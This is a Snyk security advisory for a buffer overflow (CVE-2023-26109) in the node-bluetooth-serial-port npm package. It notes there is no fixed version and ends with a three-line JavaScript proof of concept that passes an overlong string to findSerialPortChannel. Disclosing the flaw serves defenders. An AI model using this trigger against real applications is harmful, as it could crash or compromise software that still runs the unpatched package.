Buffer Overflow Affecting node-bluetooth-serial-port package, versions *


Severity

Recommended
0.0
high
0
10

CVSS assessment made by Snyk's Security Team. Learn more

Threat Intelligence

Exploit Maturity
Proof of concept
EPSS
0.23% (62nd percentile)

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications
  • Snyk IDSNYK-JS-NODEBLUETOOTHSERIALPORT-3311820
  • published8 Mar 2023
  • disclosed6 Feb 2023
  • creditRaoul Scholtes, Giancarlo Pellegrino, Cris Staicu

Introduced: 6 Feb 2023

CVE-2023-26109  (opens in a new tab)
CWE-120  (opens in a new tab)
First added by Snyk

How to fix?

There is no fixed version for node-bluetooth-serial-port.

Overview

Affected versions of this package are vulnerable to Buffer Overflow via the findSerialPortChannel method due to improper user input length validation.

PoC

const BluetoothSerialPort = require("node-bluetooth-serial-port")
const serial = new BluetoothSerialPort.BluetoothSerialPort()

serial.findSerialPortChannel("INSERT A VERY LONG STRING HERE INSTEAD OF THIS LINE", () => console.log("success"), () => console.log("error"))

CVSS Scores

version 3.1